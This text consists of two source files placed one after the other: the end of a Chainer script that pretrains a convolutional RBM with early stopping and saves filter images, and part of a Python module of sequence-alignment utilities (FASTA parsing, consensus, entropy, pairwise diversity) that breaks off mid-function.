np_test_set_x.shape[0] """ Preprocess """ #print('preprocess') start_time = timeit.default_timer() def normalize_image(np_array): np_array /= 255. np_array.astype(np.float32) normalize_image(np_train_set_x) normalize_image(np_valid_set_x) normalize_image(np_test_set_x) normalize_image(np_train_set_y) normalize_image(np_valid_set_y) normalize_image(np_test_set_y) end_time = timeit.default_timer() print('preprocess time %i sec' % (end_time - start_time)) print('preprocess time %i sec' % (end_time - start_time), file=train_log_file) """ Setup GPU """ """ Model, optimizer setup """ print('setup model') if args.gpu >= 0: cuda.get_device(args.gpu).use() model.to_gpu() # optimizer = optimizers.Adam(alpha=0.001) optimizer = optimizers.AdaDelta() # optimizer = optimizers.MomentumSGD(lr=0.0001, momentum=0.5) # 0.0001 -> value easily explodes optimizer.setup(model) """ TRAINING Early stop method is used for training to avoid overfitting, Reference: https://github.com/lisa-lab/DeepLearningTutorials """ print('training') patience = 30000 patience_increase = 2 improvement_threshold = 0.995 # 0.997 validation_frequency = min(n_train, patience // 2) * 2 best_validation_loss = np.inf iteration = 0 best_iter = 0 test_score = 0. done_looping = False plotting_time = 0. x_batch = model.preprocess_x(np_train_set_x[0: 0 + batch_size]) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) model.init_persistent_params(x) for epoch in xrange(1, n_epoch + 1): print('epoch: %d' % epoch) start_time = timeit.default_timer() perm = np.random.permutation(n_train) sum_loss = 0 for i in xrange(0, n_train, batch_size): # start_iter_time = timeit.default_timer() iteration += 1 if iteration % 1000 == 0: print('training @ iter ', iteration) x_batch = np_train_set_x[perm[i: i + batch_size]].copy() #x_batch = xp.asarray(train_scaled_x[perm[i: i + batch_size]]) #y_batch = xp.asarray(np_train_set_y[perm[i: i + batch_size]]) x_batch = model.preprocess_x(x_batch) # print('x_batch', x_batch.shape, x_batch.dtype) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) optimizer.update(model, x) sum_loss += float(model.loss.data) * batch_size # end_iter_time = timeit.default_timer() # print("iter took: %f sec" % (end_iter_time - start_iter_time)) # GPU -> iter took: 0.138625 sec print("train mean loss: %f" % (sum_loss / n_train)) print("train mean loss: %f" % (sum_loss / n_train), file=train_log_file) # Validation sum_loss = 0 for i in xrange(0, n_valid, batch_size): x_batch = np_valid_set_x[i: i + batch_size] x_batch = model.preprocess_x(x_batch) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) sum_loss += float(model(x).data) * batch_size this_validation_loss = (sum_loss / n_valid) print("valid mean loss: %f" % this_validation_loss) print("valid mean loss: %f" % this_validation_loss, file=train_log_file) if this_validation_loss < best_validation_loss: if this_validation_loss < best_validation_loss * improvement_threshold: patience = max(patience, iteration * patience_increase) print('update patience -> ', patience, ' iteration') best_validation_loss = this_validation_loss best_iter = iteration sum_loss = 0 for i in xrange(0, n_test, batch_size): x_batch = np_test_set_x[i: i + batch_size] x_batch = model.preprocess_x(x_batch) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) sum_loss += float(model(x).data) * batch_size test_score = (sum_loss / n_test) print(' epoch %i, test cost of best model %f' % (epoch, test_score)) print(' epoch %i, test cost of best model %f' % (epoch, test_score), file=train_log_file) # Save best model 
print('saving model') serializers.save_npz('my.model', model) serializers.save_npz('my.state', optimizer) if patience <= iteration: done_looping = True print('done_looping') break end_time = timeit.default_timer() print('epoch %i took %i sec' % (epoch, end_time - start_time)) print('epoch %i took %i sec' % (epoch, end_time - start_time), file=train_log_file) # Construct image from the weight matrix n_chains = 20 n_samples = 10 weight = model.get_target_crbm().conv.W.data[:, 0:1, ...] ksize = model.get_target_crbm().ksize if args.gpu >= 0: weight = cuda.to_cpu(weight) if epoch < 10 or epoch % 10 == 0: print(' ... plotting RBM weight') image = Image.fromarray( tile_raster_images( # X=rbm.W.get_value(borrow=True).T, X=weight, img_shape=(ksize, ksize), tile_shape=(10, 20), tile_spacing=(1, 1) ) ) image.save('filters_at_epoch%i.png' % epoch) if args.level == 1 and (epoch < 10 or epoch % 10 == 0): """ SAMPLING FROM the RBM """ print(' ... plotting RBM reconstruct data') image_size = 116 image_data = np.zeros( # ((image_size + 1) * n_samples + 1, (image_size + 1) * n_chains - 1), ((image_size + 1) * n_chains + 1, (image_size + 1) * n_samples - 1), dtype='uint8' ) reconstruct_x = Variable(xp.asarray(np_train_set_x[0: 0 + n_samples], dtype=xp.float32)) for idx in xrange(n_chains): image_piece = reconstruct_x.data[:, 0:1, ...] if args.gpu >= 0: image_piece = cuda.to_cpu(image_piece) image_data[(image_size + 1) * idx:(image_size + 1) * idx + image_size, :] = tile_raster_images( X=image_piece, img_shape=(image_size, image_size), tile_shape=(1, n_samples), tile_spacing=(1, 1) ) # h1_mean, h1_sample, v1_mean, reconstruct_x = rbm.gibbs_vhv(reconstruct_x) reconstruct_x = model.get_target_crbm().reconstruct(reconstruct_x) image = Image.fromarray(image_data) image.save('samples_reconstruct_epoch%i.png' % epoch) image_data = np.zeros( # ((image_size + 1) * n_samples + 1, (image_size + 1) * n_chains - 1), ((image_size + 1) * n_chains + 1, (image_size + 1) * n_samples - 1), dtype='uint8' ) reconstruct_x = Variable(xp.asarray(np_train_set_x[0: 0 + n_samples], dtype=xp.float32)) for idx in xrange(n_chains): image_piece = reconstruct_x.data[:, 0:1, ...] if args.gpu >= 0: image_piece = cuda.to_cpu(image_piece) image_data[(image_size + 1) * idx:(image_size + 1) * idx + image_size, :] = tile_raster_images( X=image_piece, img_shape=(image_size, image_size), tile_shape=(1, n_samples), tile_spacing=(1, 1) ) h1_mean, h1_sample, v1_mean, reconstruct_x = model.get_target_crbm().gibbs_vhv(reconstruct_x) image = Image.fromarray(image_data) image.save('samples_gibbs_vhv_epoch%i.png' % epoch) end_time = timeit.default_timer() pretraining_time = (end_time - start_time) - plotting_time print('Training took %i min %i sec' % (pretraining_time / 60., pretraining_time % 60))
corochann/SeRanet
src/pretrain_crbm.py
Python
mit
12,398
[ "Gaussian" ]
9c83df9abb82e1aa55c7b708bb38f45f89a782b081fae80ef649236b9f10593e
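The training loop in pretrain_crbm.py borrows the patience-based early stopping of the Theano deep learning tutorials it cites: the iteration budget only grows when validation loss improves by more than a relative threshold, and training stops once the budget is exhausted. A self-contained sketch of that schedule on made-up losses:

import numpy as np

rng = np.random.RandomState(0)
losses = np.concatenate([np.linspace(1.0, 0.2, 30),              # steady improvement
                         0.2 + 0.01 * np.abs(rng.randn(170))])   # plateau
patience, patience_increase, improvement_threshold = 20, 2, 0.995
best_loss = np.inf
for iteration, loss in enumerate(losses, start=1):
    if loss < best_loss:
        if loss < best_loss * improvement_threshold:
            # A meaningful improvement extends the iteration budget.
            patience = max(patience, iteration * patience_increase)
        best_loss = loss
    if patience <= iteration:
        print('early stop at iteration %d, best loss %.3f' % (iteration, best_loss))
        break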
from functools import * import pandas as pd import itertools try: from Bio import SeqIO, pairwise2, Phylo except ImportError: pass try: import dendropy from dendropy import treecalc except ImportError: pass from copy import deepcopy from HLAPredCache import * import subprocess import tempfile import os # from aacolors import hydrophobicity, chemistry, taylor from adjustwithin import adjustnonnan import scipy.special import sys import numpy as np import re from skbio.alignment import StripedSmithWaterman, make_identity_substitution_matrix from objhist import objhist from seqdistance import hamming_distance, seq_distance from seqdistance.matrices import addGapScores, binarySubst, nanGapScores """Utility functions that I sometimes depend on for sequence analysis. Most are old dependencies. If you can't find something, it may still be in the SVN repo 'scripts/util/seqtools_old.py' file.""" __all__ = ['BADAA', 'AALPHABET', 'AA2CODE', 'CODE2AA', 'isvalidpeptide', 'cleanAlign', 'cleanDf', 'removeBadAA', 'padAlignment', 'consensus', 'identifyMindist', 'peptideSetCoverage', 'fasta2df', 'df2fasta', 'align2fasta', 'align2mers', 'align2mers_tracked', 'fasta2align', 'sliceAlign', 'kmerSlice', 'alignmentEntropy', 'generateAlignment', 'fasta2seqs', 'seqs2fasta', 'catAlignments', 'mynorm', 'aalogoheights', 'computeAlignmentLogoHeights', 'pairwiseDiversity', 'pairwiseDiversityInterGroup', '_PD', '_PD_hamming', 'pairwiseMutualInformation', 'seqmat2align', 'align2mat', 'align2aamat', 'condenseGappyAlignment', 'nx2sif', 'kmerConsensus', 'pepComp', 'tree2pwdist', 'overlappingKmers', 'getStartPos', 'getStartPosMapper'] BADAA = '-*BX#Z' AALPHABET = 'ACDEFGHIKLMNPQRSTVWY' AA2CODE = {aa:i for i, aa in enumerate(AALPHABET)} AA2CODE.update({'-':21}) CODE2AA = {i:aa for i, aa in enumerate(AALPHABET)} CODE2AA.update({21:'-'}) def isvalidpeptide(mer, badaa=None): """Test if the mer contains an BAD amino acids in global BADAA typically -*BX#Z""" if badaa is None: badaa = BADAA if not mer is None: return not re.search('[%s]' % badaa, mer) else: return False def cleanAlign(align, badaa=None): """Remove all invalid sequences (containing badaa) from the alignment badaa is '-*BX#Z' by default""" return align.loc[[isvalidpeptide(s, badaa) for s in align]] def cleanDf(df, badaa=None): """Remove all invalid sequences (containing badaa) from the alignment badaa is '-*BX#Z' by default""" return df.loc[[isvalidpeptide(s, badaa) for s in df.seq]] def removeBadAA(mer,badaa=None): """Remove badaa amino acids from the mer, default badaa is -*BX#Z""" if badaa is None: badaa = BADAA if not mer is None: return re.sub('[%s]' % badaa, '', mer) else: return mer def _seq2vec(seq): """Convert AA sequence into numpy vector of integers for fast comparison""" vec = np.zeros(len(seq), dtype=int) for aai, aa in enumerate(seq): vec[aai] = AA2CODE[aa] return vec def padAlignment(align, applyPadding=True): """Given an iterator of sequences, convert to pd.Series Remove * or # from the end and pad sequences of different length with gaps There is a warning if gaps are used for padding Returns the align obj as pd.Series""" if type(align) in [dict, np.ndarray, list]: align = pd.Series(align) """Replace * and # with - and - """ for ind in align.index: if '*' in align[ind]: align[ind] = align[ind].replace('*', '-') if '#' in align[ind]: align[ind] = align[ind].replace('#', '-') """Pad with gaps if the lengths are all the same""" if applyPadding: L = align.map(len).unique() if len(L) > 1: #print 'Sequences have different lengths (pading with gaps): %s' % L L 
= L.max() for ind in align.index: if len(align[ind]) < L: align[ind] = align[ind].ljust(L, '-') else: L = L.max() return align def consensus(align, ignoreGaps=True): """Return a consensus sequence from the sequences in seqs seqs can be a dict or a pd.Series of sequence strings ignoresGaps unless all AA are gaps""" align = padAlignment(align) L = len(align[align.index[0]]) cons = '' for aai in np.arange(L): counts = objhist([seq[aai] for seq in align]) if ignoreGaps and len(counts)>1: droppedGaps = counts.pop('-', 0) cons += max(list(counts.keys()), key=counts.get) return cons def identifyMindist(align, ignoreGaps=True): """Compute a consensus sequence and return the sequence in the alignment with the smallest (hamming) distance Parameters ---------- align : list or pd.Series Sequence alignment. ignoreGaps : bool Passed to consensus, specifies whether gap characters are ignored for computing consensus. Returns ------- seq : str One of the sequences in align.""" align = padAlignment(align) cons = consensus(align, ignoreGaps) dist = align.map(partial(hamming_distance, cons)) return align[dist.argmin()] def peptideSetCoverage(peptides1,peptides2,mmTolerance=1): """Returns a dict that reports the fraction of peptides in peptides2 that are covered by each peptide in peptides1 by matching within a tolerance of mmTolerance. Key 'tot' indicates the cumulative coverage that peptides1 provide of peptides2 as a fraction of peptides2 Call with unique(peptides2) if Q is the fraction of unique peptides or not if Q is fraction of representative population. Note: Can be used as a non-symetric distance between two peptide sets""" oh1 = objhist(peptides1) coveredPeps = {k:[] for k in set(oh1.keys())} coveredPeps.update({'tot':[]}) cache = {} for pep2 in peptides2: anyCover = False for pep1 in set(peptides1): try: dist = cache[(pep1, pep2)] except KeyError: dist = seq_distance(pep1, pep2, subst=binarySubst, normed=False) cache.update({(pep1, pep2):dist,(pep2, pep1):dist}) if dist <= mmTolerance: coveredPeps[pep1].append(pep2) anyCover = True if anyCover: coveredPeps['tot'].append(pep2) coverage={k:len(v)/len(peptides2) for k, v in list(coveredPeps.items())} return coverage def fasta2seqs(fn): return [str(r.seq) for r in SeqIO.parse(open(fn, 'r'), 'fasta')] def seqs2fasta(seqs, fn): with open(fn, 'w') as fh: for i, s in enumerate(seqs): fh.write('>seq%d\n' % i) fh.write('%s\n' % s) def fasta2df(fn, sep='.', columns=['clade', 'country', 'year', 'name', 'seqid'], index=None, uniqueIndex=True): """Read in a fasta file and turn it into a Pandas DataFrame Defaults parse the HIV LANL fasta alignments. Parameters ---------- sep : str Separator in the description field. columns : list List of the sep delimited column names in-order. 
index : str Column to use as the DataFrame index (default: None) Returns ------- seqDf : pd.DataFrame All sequences from the fasta file with a seq column containing the sequences.""" with open(fn, 'r') as fh: records = SeqIO.parse(fh, 'fasta') sDict = {'seq':[]} sDict.update({k:[] for k in columns}) for r in records: sDict['seq'].append(str(r.seq)) info = r.description.split(sep) for i in np.arange(len(columns)): if i < len(info): sDict[columns[i]].append(info[i]) else: sDict[columns[i]].append('') seqDf = pd.DataFrame(sDict) if not index is None: if seqDf.shape[0] == seqDf[index].unique().shape[0] or not uniqueIndex: """If the index is unique fine, otherwise make a unique index by appending _%d""" seqDf = seqDf.set_index(index) else: tmp = seqDf[index].copy() for i, ind in enumerate(tmp.index): tmp[ind] = '%d_%s' % (i, tmp[ind]) seqDf = seqDf.set_index(tmp) return seqDf def df2fasta(df, fn, sep='.', columns=None): """Writes the Df from fasta2df back to a FASTA file""" if columns is None: columns = list(df.columns) if 'seq' in columns: columns.remove('seq') with open(fn, 'w') as fh: for ind, row in df.iterrows(): label = '>%s' % ind for col in columns: label += '%s%s' % (sep, row[col]) fh.write('%s\n' % label) fh.write('%s\n' % row['seq']) def align2fasta(align, fn, applyPadding = True): """Write align to a FASTA file where align is a dict or pd.Series of sequences""" align = padAlignment(align, applyPadding) with open(fn, 'w') as fh: for i in np.arange(align.shape[0]): ind = align.index[i] fh.write('>%s\n' % ind) fh.write('%s\n' % align.iloc[i]) def align2mers(align, fn=None, nmers=[9]): """Compute all nmers in align and write to a mers file for prediction""" align = padAlignment(align) mers = [] for seq in align: mers.extend(getMers(re.sub('[%s]' % BADAA, '', seq), nmers)) mers=set(mers) if not fn is None: with open(fn, 'w') as fh: for pep in mers: fh.write('%s\n' % pep) else: return list(mers) def align2mers_tracked(align, nmers=[9], firstOnly=True): """Return a df of all nmers in the alignment along with start position and seq index""" align = padAlignment(align) cols = ['peptide', 'starti', 'seqi', 'L', 'count'] outD = {k:[] for k in cols} for k in nmers: for seqi, seq in enumerate(align): for starti in range(len(seq)-k+1): mer = grabKmer(seq, starti, k)[1] if not mer is None: if not firstOnly or not mer in outD['peptide']: outD['peptide'].append(mer) outD['starti'].append(starti) outD['seqi'].append(align.index[seqi]) outD['L'].append(k) outD['count'].append(1) else: ind = outD['peptide'].index(mer) outD['count'][ind] += 1 return pd.DataFrame(outD)[cols] def fasta2align(fn,uniqueIndex=True): """Read sequences from a FASTA file and store in a pd.Series object indexed by the description""" return fasta2df(fn, sep=None, columns=['name'], index='name', uniqueIndex=uniqueIndex).seq def sliceAlign(align,region,sites=False): """Return a region of the alignment where region is (start, end) OR if sites is True then include all sites in region (not range)""" if region is None: return align elif sites: return align.map(lambda seq: ''.join([seq[r] for r in region])) else: return align.map(lambda seq: seq[region[0]:region[1]]) def kmerSlice(align,starti,k,gapped=True): """Return a slice of an alignment specified by kmer start position. Uses grabKmer to return "gapped" or "non-gapped" kmers. 
Note: Using non-gapped slices can return None when a kmer begins with a gap or if it is near the end and there are insufficient non-gap characters""" if gapped: grabKmerFlag = 0 else: grabKmerFlag = 1 return align.map(lambda s: grabKmer(s, starti, k)[grabKmerFlag]) def alignmentEntropy(align, statistic='absolute', removeGaps=False, k=1, logFunc=np.log): """Calculates the entropy of each site (or kmer) in a sequence alignment. Also can compute: - "uniqueness" which I define to be the fraction of unique sequences - "uniquenum" which is the number of unique sequences Parameters ---------- align : pd.Series() or list Alignment of sequences. statistic : str Statistic to be computed: absolute, uniqueness Uniqueness is the fraction of unique sequences. Uniquenum is the number of unique AA at each position. removeGaps : bool Remove from the alignment at each position, kmers that start with a gap character. Also use "non-gapped kmers" (ie skipping gaps) k : int Length of the kmer to consider at each start position in the alignment. (default 1 specifies site-wise entropy) logFunc : function Default is natural log, returning nats. Can also use log2 for bits. Return ------ out : float Output statistic.""" if removeGaps: grabKmerFlag = 1 else: grabKmerFlag = 0 align = padAlignment(align) L = len(align[align.index[0]]) nKmers = L - k + 1 entropy = np.zeros(nKmers, dtype=float) for aai in np.arange(nKmers): kmers = [grabKmer(seq, aai, k)[grabKmerFlag] for seq in align] """kmers that start with a gap or that are at the end and are of insufficient length, will be None""" kmers = [mer for mer in kmers if not mer is None] oh = objhist(kmers) if statistic == 'absolute': entropy[aai] = oh.entropy() elif statistic == 'uniqueness': entropy[aai] = oh.uniqueness() elif statistic == 'uniquenum': entropy[aai] = len(list(oh.keys())) return entropy def generateAlignment(seqs): """Use MUSCLE to align the seqs. muscle -in new_seqs.fa -out new_seqs.afa Parameters ---------- seqs : list Return ------ align : pd.Series() Aligned sequences. """ """Create temporary file for MUSCLE""" inFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) outFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) """Creates an align object or pd.Series() with indexing to preserve order but does not apply padding""" align = padAlignment(seqs, applyPadding=False) """Put alignments in the tempfiles""" align2fasta(seqs, inFn, applyPadding=False) muscleCommand = ['muscle', '-in', inFn, '-out', outFn] result = subprocess.call(muscleCommand) """If MUSCLE was successful""" if not result: outAlign = fasta2align(outFn) else: print("Error in MUSCLE!") raise Exception("MUSCLEError") """Remove the temporary files""" os.remove(inFn) os.remove(outFn) """MUSCLE seqs need to be reordered using the original index""" outAlign = outAlign.loc[[str(i) for i in align.index]] """Index was str() through FASTA files so reset index with original index""" outAlign.index = align.index """Check that all seqs are being returned in the correct order""" badSeqs = 0 if not len(seqs) == len(outAlign): print('Different number of output seqs!') badSeqs+=1 for i, s1, s2 in zip(np.arange(len(seqs)), seqs, outAlign): if not s1.replace('-', '') == s2.replace('-', ''): print('%d: %s != %s' % (i, s1, s2)) badSeqs+=1 if badSeqs>0: raise Exception('Output seqs are different than input seqs! 
(%d)' % badSeqs) return outAlign def catAlignments(alignA, alignB): """ Take two dict or pd.Series as alignments and combine using MUSCLE Return a pd.Series of all aligned sequences indexed by original seq keys (keys are suffixed with A or B if necessary) From MUSCLE documentation: To align one sequence to an existing alignment: muscle -profile -in1 existing_aln.afa -in2 new_seq.fa -out combined.afa If you have more than one new sequence, you can align them first then add them, for example: muscle -in new_seqs.fa -out new_seqs.afa muscle -profile -in1 existing_aln.afa -in2 new_seqs.afa -out combined.afa """ """Create temporary files for MUSCLE to work on the two alignments""" aFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) bFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) outFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) """Make sure alignments have the same length and are Series objects""" alignA = padAlignment(alignA) alignB = padAlignment(alignB) """Put alignments in the tempfiles""" align2fasta(alignA, aFn) align2fasta(alignB, bFn) muscleCommand = ['muscle', '-profile', '-in1', aFn, '-in2', bFn, '-out', outFn] result = subprocess.call(muscleCommand) """If MUSCLE was successful""" if not result: outAlign = fasta2align(outFn) else: print("Error in MUSCLE!") raise Exception("MUSCLEError") """ except: pass os.remove(aFn) os.remove(bFn) os.remove(outFn) raise """ """Remove the temporary files""" os.remove(aFn) os.remove(bFn) os.remove(outFn) return outAlign def mynorm(vec, mx=1, mn=0): """Normalize values of vec in-place to [mn, mx] interval""" vec -= np.nanmin(vec) vec = vec/np.nanmax(vec) vec = vec*(mx-mn)+mn return vec def aalogoheights(aahistObj, N=20): """For an objhist of AA frequencies, compute the heights of each AA for a logo plot""" aahistObj = deepcopy(aahistObj) keys = list(aahistObj.keys()) for aa in BADAA: if aa in keys: dummy = aahistObj.pop(aa) keys = [aa for aa in aahistObj.sortedKeys(reverse=False)] freq = aahistObj.freq() p = np.array([freq[k] for k in keys]) #err = (1/np.log(2))*((N-1) / (2*aahistObj.sum())) #totEntropy = np.log2(N)-((-p*np.log2(p)).sum() + err) totEntropy = np.log2(N)-((-p*np.log2(p)).sum()) heights = p * totEntropy return keys, heights def computeAlignmentLogoHeights(fullAlign, region=None): """Compute heights for a sequence logo plot of relative entropy Returns a vector of heights""" fullAlign = padAlignment(fullAlign) align = sliceAlign(fullAlign, region) L = len(align[align.index[0]]) tot = np.zeros(L) for sitei in np.arange(L): aaHist = objhist([seq[sitei] for seq in align]) aaKeys, entropy = aalogoheights(aaHist) tot[sitei] = entropy.sum() return tot def pairwiseDiversity(fullAlign,region=None,subst=None,bySite=True): """Calculate sitewise pairwise diversity for an alignment By default it will use a "hamming" substitution matrix All gap comparisons are nan if bySite is False then compute single PD based on whole-sequence distances Return the fraction of valid (non-gap) pairwise comparisons at each site that are AA mismatched""" fullAlign = padAlignment(fullAlign) align = sliceAlign(fullAlign, region) L = len(align[align.index[0]]) if subst is None: return _PD_hamming(align, None, subst, bySite, True) return _PD(align, None, subst, bySite, True) def pairwiseDiversityInterGroup(align1, align2, region=None, subst=None, bySite=True): """Calculate pairwise diversity between two alignments By default it will use a "hamming" substitution matrix All gap comparisons are nan if bySite is False then 
compute single PD based on whole-sequence distances Return the fraction of valid (non-gap) pairwise comparisons at each site that are AA mismatched""" """Does not perform "padding" so alignments must have same sequence lengths""" align1 = sliceAlign(align1, region) align2 = sliceAlign(align2, region) L = len(align1[align1.index[0]]) if subst is None: return _PD_hamming(align1, align2, subst, bySite, False) return _PD(align1, align2, subst, bySite, False) def _PD(alignA, alignB, subst, bySite, withinA): """Computation for pairwise diversity""" L = len(alignA.iloc[0]) """Dist will be 1 where equal, 0 where not and nan if one is a gap""" if withinA: dist = np.zeros((int(scipy.special.comb(len(alignA), 2)), L)) allPairs = itertools.combinations(alignA, 2) else: dist = np.zeros((len(alignA)*len(alignB), L)) allPairs = itertools.product(alignA, alignB) j = 0 for seq1, seq2 in allPairs: """This line is the bottleneck. I should try some optimization here. This would help with all distance functions""" dist[j,:] = np.array([i for i in map(lambda a, b: subst.get((a, b), subst.get((b, a))), seq1, seq2)]) j += 1 """Actually, pairwise diversity is a distance, not a similarity so identical AA should be counted as 0""" dist = 1-dist if not bySite: dist = np.nanmean(dist, axis=1) return np.nanmean(dist, axis=0) def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True): """Computation for pairwise diversity using a vector optimized hamming distance. Optionally ignoreGaps treats gap comparisons as NaN""" L = len(alignA.iloc[0]) gapCode = AA2CODE['-'] """Convert alignments into integer arrays first to speed comparisons""" matA = np.zeros((len(alignA), L)) for seqi, s in enumerate(alignA): matA[seqi,:] = _seq2vec(s) if not withinA: matB = np.zeros((len(alignB), L)) for seqi, s in enumerate(alignB): matB[seqi,:] = _seq2vec(s) """Dist will be 1 where equal, 0 where not and nan if one is a gap""" if withinA: dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L)) allPairs = itertools.combinations(np.arange(len(alignA)), 2) for j, (seqi1, seqi2) in enumerate(allPairs): dist[j,:] = matA[seqi1,:]!=matA[seqi2,:] if ignoreGaps: gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode) dist[j, gapInd] = np.nan else: dist=np.zeros((len(alignA)*len(alignB), L)) allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB))) for j, (seqiA, seqiB) in enumerate(allPairs): dist[j,:] = matA[seqiA,:]!=matB[seqiB,:] if ignoreGaps: gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode) dist[j, gapInd] = np.nan if not bySite: dist=np.nanmean(dist, axis=1) return np.nanmean(dist, axis=0) def pairwiseMutualInformation(align, nperms=1e4): """Compute the pairwise mutual information of all sites in the alignment Return matrix of M and p-values""" L=len(align[align.index[0]]) columns = [align.map(lambda s: s[i]) for i in np.arange(L)] M = np.nan*np.zeros((L, L)) p = np.nan*np.zeros((L, L)) Mstar = np.nan*np.zeros((L, L)) for xi, yi in itertools.combinations(np.arange(L), 2): freqx = objhist(columns[xi]) freqy = objhist(columns[yi]) tmpM, tmpMstar, tmpp, Hx, Hy, Hxy = mutual_information(columns[xi], columns[yi], logfunc=np.log2, nperms=nperms) """We wouldn't need to test invariant sites or a site with itself""" if len(freqx) == 1 or len(freqy) == 1: tmpp = np.nan elif xi == yi: tmpp = np.nan M[xi, yi] = tmpM p[xi, yi] = tmpp Mstar[xi, yi] = tmpMstar q = adjustnonnan(p) return M, Mstar, p, q def seqmat2align(smat,index=None): """Convert from an array of dtype=S1 to alignment""" if index is None: index = 
np.arange(smat.shape[0]) return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index) def align2mat(align, k=1, gapped=True): """Convert an alignment into a 2d numpy array of kmers [nSeqs x nSites/nKmers] If gapped is True, returns kmers with gaps included. If gapped is False, returns "non-gapped" kmers and each kmer starting with a gap is '-'*k See grabKmer() for definition of non-gapped kmer.""" tmp = padAlignment(align) L = len(tmp.iloc[0]) Nkmers = L-k+1 if gapped: """Slightly faster, but not as flexible""" out = np.array([[s[i:i+k] for i in range(Nkmers)] for s in tmp], dtype='S%d' % k) else: out = np.empty((L, Nkmers), dtype='S%d' % k) for seqi, seq in enumerate(tmp): for starti in range(Nkmers): #out[seqi,starti] = seq[starti:starti+k] full, ng = grabKmer(seq, starti, k=k) if ng is None: ng = '-'*k out[seqi, starti] = ng return out def align2aamat(align): """Convert an alignment into a 3d boolean numpy array [nSeqs x nSites x nAAs]""" for seq in align: L = len(seq) break aaMat = align2mat(align) aaFeat = np.zeros((len(align), L, len(AALPHABET))) for seqi, sitei in itertools.product(range(aaFeat.shape[0]), list(range(aaFeat.shape[1]))): try: aai = AALPHABET.index(aaMat[seqi, sitei]) aaFeat[seqi, sitei, aai] = 1. except ValueError: """If AA is not in AALPHABET then it is ignored""" continue return aaFeat def condenseGappyAlignment(a, thresh=0.9): """Find sites with more than thresh percent gaps. Then remove any sequences with non-gaps at these sites and remove the sites from the alignment.""" a = padAlignment(a) smat = align2mat(a) gapSiteInd = np.mean(smat == b'-', axis=0) >= thresh keepSeqInd = np.all(smat[:, gapSiteInd] == b'-', axis=1) print('Removing %d of %d sites and %d of %d sequences from the alignment.' % (gapSiteInd.sum(), smat.shape[1], (~keepSeqInd).sum(), smat.shape[0])) smat = smat[keepSeqInd,:] smat = smat[:, ~gapSiteInd] return seqmat2align(smat, index=a.index[keepSeqInd]) def nx2sif(fn, g): """Write Networkx Graph() to SIF file for BioFabric or Cytoscape visualization""" with open(fn, 'w') as fh: for e in g.edges_iter(): fh.write('%s pp %s\n' % (e[0], e[1])) def generateSequences(a,N=1,useFreqs=True): """Generate new sequences based on those in alignment a The AA at each position are chosen independently from the observed AAs and may or may not be chosen based on their frequency. If useFreqs is True then returns exactly N sequences that are not neccessarily unique. 
Else returns N unique sequences or as many as possible, printing an error if actualN < N""" a = padAlignment(a) L = len(a.iloc[0]) if useFreqs: smat = np.empty((N, L), dtype='S1') for i in np.arange(L): oh = objhist(sliceAlign(a, (i, i+1))) smat[:, i] = oh.generateRandomSequence(N, useFreqs=True) else: chunkN = int(np.ceil(N/10)) smat = None counter = 0 actualN = 0 while actualN < N and counter < N*100: tmpmat = np.empty((chunkN, L), dtype='S1') for i in np.arange(L): oh = objhist(sliceAlign(a, (i, i+1))) tmpmat[:, i] = oh.generateRandomSequence(chunkN, useFreqs=False) if smat is None: smat = tmpmat else: smat = np.concatenate((smat, tmpmat), axis=0) smat = unique_rows(smat) actualN = smat.shape[0] counter += 1 outAlign = seqmat2align(smat[:actualN,:]) if actualN<N: print("Could not create N = %d unique sequences with %d attempts" % (N, counter*10)) smat = smat[:actualN,:] outAlign = seqmat2align(smat) return outAlign def kmerConsensus(align,k=9,verbose=False): """From an alignment of sequences create a k-mer consensus sequence by identifying the most common whole k-mer at each start position and using those residues as the consensus. This will result in more than one consensus amino acid at many sites. Parameters ---------- align : list or pd.Series Alignment of amino acid sequences all with the same length. k : int Width of the kmer window. Returns ------- con : str Consensus sequence taking the mode at each position full : list of dicts, len(full) == len(con) Each element of the list is a position in the alignment. Each dict contains keys/values of the consensus residues and their number at each position. Example ------- >>> seqs = ['ABCDE', 'ABCDE', 'ABCDE', 'ABCDE', 'ABCIE', 'ABCIE', 'ABFIE', 'ABFIE', 'ABFIE', 'ABFIE'] >>> kcon,full = kmerConsensus(seqs,k=3,verbose=True) ABC BCD CDE Seq1: true consensus Seq2: 3mer consensus Pos 1 - 5 A B C I E | A B C D E Seq1 (5) and Seq2 (5) are 80.0% similar >>> print full [{'A': 1}, {'B': 2}, {'C': 3}, {'D': 2}, {'E': 1}] """ align = padAlignment(align) L = len(align.iloc[0]) Nkmers = L-k+1 """Get a 2D array of alignment [nSeqs x nSites]""" mat = align2mat(align) full = [dict() for i in np.arange(L)] for starti in np.arange(Nkmers): """Create a temporary alignment of the ith kmer""" tmpA = seqmat2align(mat[:, starti:starti+k]) """Pick off the most common kmer at that start position""" top1 = objhist(tmpA).topN(n=2)[0][0] if verbose: print(' '*starti + top1) #print ' '*starti + objhist(tmpA).topN(n=2)[1][0] """Add each AA in the most frequent kmer to the consensus""" for j, startj in enumerate(np.arange(starti, starti+k)): try: full[startj][top1[j]] += 1 except KeyError: full[startj][top1[j]] = 1 """Consensus is the mode AA at each position in full""" con = ''.join([max(list(pos.keys()), key=pos.get) for pos in full]) if verbose: print('Seq1: true consensus') print('Seq2: %dmer consensus' % k) compSeq(consensus(align), con) return con, full def pepComp(align,useConsensus=True): """Return align with mix of upper and lower case AA residues depending on whether they match or mismatch the consensus or mindist sequence.""" if useConsensus: ref = consensus(align) else: ref = identifyMindist(align) out = [] for seq in align: out.append(''.join([aa.upper() if aa.upper()==refaa.upper() else aa.lower() for aa, refaa in zip(seq, ref)])) return out def tree2pwdist(tree): """Compute pairwise distances between every leaf on the 